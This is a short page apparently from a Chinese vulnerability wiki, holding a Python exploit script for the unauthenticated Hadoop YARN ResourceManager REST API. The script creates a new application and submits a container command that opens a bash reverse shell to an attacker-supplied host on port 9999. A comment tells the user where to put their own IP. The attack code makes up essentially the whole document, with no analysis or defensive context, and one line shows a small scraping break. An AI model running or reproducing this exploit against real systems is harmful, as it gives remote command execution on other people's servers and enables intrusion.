PWNWIK.COM
,
EXP
#!/usr/bin/env python import requests target = 'http://x.x.x.x:8088/' lhost = 'x.x.x.x' #把本地主机ip放在这里,在9999端口监听(使用时删除注释) url = target + 'ws/v1/cluster/apps/new-application' resp = requests.post(url) app_id = resp.json()'application-id' url = target + 'ws/v1/cluster/apps' data = { 'application-id': app_id, 'application-name': 'get-shell', 'am-container-spec': { 'commands': { 'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost, }, }, 'application-type': 'YARN', } requests.post(url, json=data)
PWNWIK.COM==免费、自由、人人可编辑的漏洞库